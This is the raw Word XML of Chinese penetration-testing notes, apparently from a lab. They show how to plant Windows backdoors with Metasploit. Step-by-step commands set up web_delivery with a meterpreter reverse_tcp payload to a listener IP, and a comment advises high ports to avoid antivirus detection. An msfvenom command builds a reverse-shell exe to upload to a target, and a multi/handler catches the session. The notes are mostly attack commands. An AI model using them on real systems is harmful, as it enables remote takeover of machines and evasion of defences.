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8B86" w14:textId="22CADE6F" w:rsidR="00D807E7" w:rsidRDefault="00333507">
      <w:r w:rsidRPr="00185BDD">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00185BDD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>indow系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC415E0" w14:textId="294A17C2" w:rsidR="00E8564F" w:rsidRPr="00E8564F" w:rsidRDefault="00E8564F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E8564F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E8564F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="535F6C44" w14:textId="1AD6D550" w:rsidR="00333507" w:rsidRDefault="00206CD7" w:rsidP="001F3962">
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CC5F76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="00CC5F76">
        <w:t>sfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7190FA3B" w14:textId="382F3676" w:rsidR="00CC5F76" w:rsidRDefault="00206CD7" w:rsidP="001F3962">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="116B4629" wp14:editId="2C407647">
            <wp:extent cx="5274310" cy="774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  <w:r w:rsidR="00A87816">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00A87816">
        <w:t>se exploit/multi/sc</w:t>
      </w:r>
      <w:r w:rsidR="00CA45A8">
        <w:t>ript/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CA45A8">
        <w:t>web_delivery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3ED3CEE0" w14:textId="3BAACDD3" w:rsidR="00CA45A8" w:rsidRDefault="00AF43A8" w:rsidP="001F3962">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CD1ADBD" wp14:editId="6307C203">
            <wp:extent cx="5274310" cy="176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E3D" w14:textId="2C756292" w:rsidR="00AF43A8" w:rsidRDefault="00AF43A8" w:rsidP="001F3962">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>set targ</w:t>
      </w:r>
      <w:r w:rsidR="006417CC">
        <w:t xml:space="preserve">et </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006417CC">
        <w:t>2</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2E53576D" w14:textId="69AD98BD" w:rsidR="009758DC" w:rsidRPr="00593186" w:rsidRDefault="009758DC" w:rsidP="001F3962">
      <w:r>
        <w:t xml:space="preserve">&gt;set payload </w:t>
      </w:r>
      <w:r w:rsidRPr="00593186">
        <w:t>windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00593186">
        <w:t>mete</w:t>
      </w:r>
      <w:r w:rsidR="002B524B" w:rsidRPr="00593186">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00593186">
        <w:t>pr</w:t>
      </w:r>
      <w:r w:rsidR="00833647" w:rsidRPr="00593186">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00593186">
        <w:t>ter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00833647" w:rsidRPr="00593186">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00833647" w:rsidRPr="00593186">
        <w:t>reveser_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00833647" w:rsidRPr="00593186">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="75CFC452" w14:textId="3581AE36" w:rsidR="00AD1888" w:rsidRDefault="00AD1888" w:rsidP="001F3962">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B051DF1" wp14:editId="49BEC05B">
            <wp:extent cx="5274310" cy="43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5CB" w14:textId="6C9B1113" w:rsidR="006417CC" w:rsidRDefault="006417CC" w:rsidP="001F3962">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.184.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693E89ED" w14:textId="2D129A39" w:rsidR="006417CC" w:rsidRDefault="006417CC" w:rsidP="001F3962">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 9999  //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>越大越好，高端口不容易报毒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB3458A" w14:textId="5BBD4AFF" w:rsidR="00AC5D61" w:rsidRDefault="00AC5D61" w:rsidP="001F3962">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2191993C" wp14:editId="7E6D0491">
            <wp:extent cx="5274310" cy="281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881E" w14:textId="156C8D42" w:rsidR="006417CC" w:rsidRDefault="006417CC" w:rsidP="001F3962">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srv</w:t>
      </w:r>
      <w:r w:rsidR="00AD1888">
        <w:t>port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD1888">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AD1888">
        <w:t>8888</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0073D973" w14:textId="099B0ABD" w:rsidR="00AD1888" w:rsidRDefault="00AC5D61" w:rsidP="001F3962">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uripath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF7A9F0" w14:textId="6B7C8B3F" w:rsidR="00AC5D61" w:rsidRDefault="005F7A70" w:rsidP="001F3962">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F9F43C5" wp14:editId="06905E41">
            <wp:extent cx="5274310" cy="295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F376" w14:textId="318AF953" w:rsidR="005F7A70" w:rsidRDefault="005F7A70" w:rsidP="001F3962">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置完成之后</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8BC0F1" w14:textId="67CAE375" w:rsidR="005F7A70" w:rsidRDefault="005F7A70" w:rsidP="001F3962">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D84FD75" w14:textId="7369CF69" w:rsidR="00185BDD" w:rsidRDefault="00185BDD" w:rsidP="001F3962">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="255F6CD7" wp14:editId="6835CF97">
            <wp:extent cx="5274310" cy="1313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DD24" w14:textId="1EF8FE00" w:rsidR="00185BDD" w:rsidRDefault="00185BDD" w:rsidP="001F3962">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成了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后门。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5134F608" w14:textId="2675325A" w:rsidR="00E8564F" w:rsidRDefault="00E8564F" w:rsidP="001F3962">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00225470">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>生成exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79196901" w14:textId="529B63DA" w:rsidR="00091AD2" w:rsidRPr="00225470" w:rsidRDefault="00091AD2" w:rsidP="001F3962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生成exe后门，上传到靶机中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296A6AFA" w14:textId="1DB854FB" w:rsidR="00E8564F" w:rsidRDefault="002708F9" w:rsidP="001F3962">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006902DF">
        <w:t>:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="00225470">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006902DF" w:rsidRPr="006902DF">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006902DF" w:rsidRPr="006902DF">
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006902DF" w:rsidRPr="006902DF">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006902DF" w:rsidRPr="006902DF">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006902DF" w:rsidRPr="006902DF">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006902DF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006902DF" w:rsidRPr="006902DF">
        <w:t>LHOST=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE74F5">
        <w:t>kali_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006902DF" w:rsidRPr="006902DF">
        <w:t xml:space="preserve"> LPORT=1234 -f exe &gt; /aaa.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CB407B" w14:textId="44B9FE85" w:rsidR="006902DF" w:rsidRPr="00FE74F5" w:rsidRDefault="00091AD2" w:rsidP="001F3962">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE74F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE74F5">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE74F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE74F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>进入exploit/</w:t>
      </w:r>
      <w:r w:rsidR="005E737D" w:rsidRPr="00FE74F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>multi/handle</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE74F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>模块</w:t>
      </w:r>
      <w:r w:rsidR="005E737D" w:rsidRPr="00FE74F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>进行后门的利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E661700" w14:textId="0A3BA398" w:rsidR="005E737D" w:rsidRDefault="005E737D" w:rsidP="001F3962">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exploit/multi/handle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFFC254" w14:textId="6FFB03D5" w:rsidR="005E737D" w:rsidRDefault="005E737D" w:rsidP="001F3962">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r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0BCF02BC" w14:textId="10CEDA95" w:rsidR="005E737D" w:rsidRDefault="005E737D" w:rsidP="001F3962">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE74F5">
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE74F5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE74F5">
        <w:t>kali_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FE74F5">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6AA42EF6" w14:textId="0AECB1DC" w:rsidR="00FE74F5" w:rsidRDefault="00FE74F5" w:rsidP="001F3962">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1234</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5F002A8D" w14:textId="4228C504" w:rsidR="00FE74F5" w:rsidRDefault="00FE74F5" w:rsidP="001F3962">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CADA0A1" w14:textId="5FBFF83D" w:rsidR="00FE74F5" w:rsidRPr="00FE74F5" w:rsidRDefault="00FE74F5" w:rsidP="001F3962">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE74F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE74F5">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE74F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>运行靶机中的后门文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F74B05" w14:textId="20127928" w:rsidR="00FE74F5" w:rsidRDefault="00185BDD" w:rsidP="001F3962">
      <w:r w:rsidRPr="00185BDD">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00185BDD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>inux</w:t>
      </w:r>
      <w:r w:rsidR="001D7EE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（后续补充）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672429D8" w14:textId="77777777" w:rsidR="00185BDD" w:rsidRDefault="00185BDD" w:rsidP="001F3962"/>
    <w:sectPr w:rsidR="0018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EF"/>
    <w:rsid w:val="00091AD2"/>
    <w:rsid w:val="00185BDD"/>
    <w:rsid w:val="001D7EE7"/>
    <w:rsid w:val="001F3962"/>
    <w:rsid w:val="00206CD7"/>
    <w:rsid w:val="00225470"/>
    <w:rsid w:val="002708F9"/>
    <w:rsid w:val="002B524B"/>
    <w:rsid w:val="00333507"/>
    <w:rsid w:val="005701EF"/>
    <w:rsid w:val="00593186"/>
    <w:rsid w:val="005E737D"/>
    <w:rsid w:val="005F7A70"/>
    <w:rsid w:val="006417CC"/>
    <w:rsid w:val="006902DF"/>
    <w:rsid w:val="00833647"/>
    <w:rsid w:val="009758DC"/>
    <w:rsid w:val="00A87816"/>
    <w:rsid w:val="00AC5D61"/>
    <w:rsid w:val="00AD1888"/>
    <w:rsid w:val="00AF43A8"/>
    <w:rsid w:val="00CA45A8"/>
    <w:rsid w:val="00CC5F76"/>
    <w:rsid w:val="00D15634"/>
    <w:rsid w:val="00D807E7"/>
    <w:rsid w:val="00E8564F"/>
    <w:rsid w:val="00FE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0DBB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F1937A3D-BE0D-4332-9A86-09A91BF6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26</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-08T15:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-28T13:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>